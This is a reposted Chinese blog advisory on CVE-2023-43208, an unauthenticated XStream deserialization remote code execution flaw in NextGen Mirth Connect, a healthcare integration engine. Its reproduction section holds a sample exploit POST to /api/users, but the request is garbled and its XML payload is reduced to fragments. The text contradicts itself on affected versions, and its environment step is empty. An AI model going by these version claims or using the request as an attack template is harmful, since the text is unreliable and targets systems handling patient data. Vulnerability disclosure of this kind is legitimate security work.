NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)-白红宇

NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)

阅读量：791 次

发布时间：2023-02-15

本文共 501 字，大约阅读时间需要 1 分钟。

NextGen Mirth Connect 是美国 NextGen 公司开发的医疗集成引擎，主要用于医疗系统的数据交换与集成，支持多种协议和行业标准。

漏洞概述

NextGen Mirth Connect 4.4.1 及之前版本存在一个远程代码执行漏洞。该漏洞未经身份验证的攻击者可利用，可能导致远程代码执行。

影响范围

该漏洞影响所有版本的 NextGen Mirth Connect，版本号小于 4.4.1 的系统均存在此漏洞。

复现环境

为复现该漏洞，建议环境配置如下：

确保系统处于正常运行状态

漏洞复现

通过 POST 请求发送特定请求头和内容即可触发漏洞。以下是示例：

POST /api/users HTTP/1.1Host: your-ipX-Requested-With: OpenAPIContent-Type: application/xml
     
    
     abcd
      
        
     
      java.lang.Comparable

转载地址：http://oxcfk.baihongyu.com/

你可能感兴趣的文章

netmiko 自动判断设备类型python_Python netmiko模块的使用